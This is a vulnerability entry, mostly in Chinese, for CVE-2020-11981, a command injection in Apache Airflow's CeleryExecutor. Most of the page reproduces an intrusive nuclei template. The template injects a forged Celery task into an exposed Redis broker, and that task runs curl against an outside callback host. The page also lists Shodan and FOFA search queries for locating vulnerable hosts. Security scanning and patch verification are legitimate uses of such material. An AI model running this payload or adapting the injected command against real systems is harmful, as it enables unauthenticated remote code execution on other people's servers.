Apache Airflow Command Injection Vulnerability

漏洞信息

漏洞名称: Apache Airflow Command Injection Vulnerability

漏洞编号:

  • CVE: CVE-2020-11981

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Apache Airflow是一个开源的工作流自动化工具,广泛用于数据管道的编排、调度和监控。它支持多种执行器,包括CeleryExecutor,用于分布式任务执行。该漏洞影响Apache Airflow 1.10.10及以下版本,当使用CeleryExecutor时,攻击者若能直接连接到消息代理(如Redis、RabbitMQ),可注入恶意命令,导致Celery工作节点执行任意命令。此漏洞的根源在于对用户输入的不当验证,使得攻击者能够通过构造特定的消息来绕过安全限制。成功利用此漏洞的攻击者可以在目标系统上执行任意命令,可能导致数据泄露、服务中断或其他恶意活动。由于攻击者无需认证即可利用此漏洞,且攻击过程可自动化,因此该漏洞的安全风险极高。建议用户尽快升级到Apache Airflow 1.10.11或更高版本以修复此漏洞。

产品厂商: Apache

产品名称: Airflow

影响版本: <=1.10.10

搜索语法: product:”redis” || http.title:”airflow - dags” || http.html:”apache airflow” || http.title:”sign in - airflow”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2020%2FCVE-2020-11981.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83

id: CVE-2020-11981

info:
name: Apache Airflow <=1.10.10 - Command Injection
author: pussycat0x, NaN@korelogic
severity: critical
description: |
An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
remediation: Upgrade apache-airflow to version 1.10.11 or higher.
reference:
- https://github.com/apache/airflow/pull/9178
- https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
- https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
- https://github.com/t0m4too/t0m4to
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11981
cwe-id: CWE-78
epss-score: 0.90015
epss-percentile: 0.99560
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: apache
product: airflow
shodan-query:
- product:"redis"
- http.title:"airflow - dags" || http.html:"apache airflow"
- http.title:"sign in - airflow"
fofa-query:
- apache airflow
- title="airflow - dags" || http.html:"apache airflow"
- title="sign in - airflow"
google-query:
- intitle:"airflow - dags" || http.html:"apache airflow"
- intitle:"sign in - airflow"
tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp
variables:
data: "*3\r

$5\r

LPUSH\r

$7\r

default\r

$936\r

{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
encode1: '[[["curl", "http://'
encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
end: '"}'
tcp:
- inputs:
- data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r

')}}"
read: 1024
host:
- "{{Hostname}}"
- "{{Host}}:{{Port}}"

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4a0a00473045022100f0607764184af7cb47c39f175da5ab162d149de04d38d3c8f31704fdc1c9dfaf02202f486afeba26d345dc626bf8d57a9b763000fe9f6140eed4c984bac7d1528d9c:922c64590222798bb761d5b6d8e72950


Apache Airflow Command Injection Vulnerability
http://example.com/2025/07/06/github_2777471197/
作者
lianccc
发布于
2025年7月6日
许可协议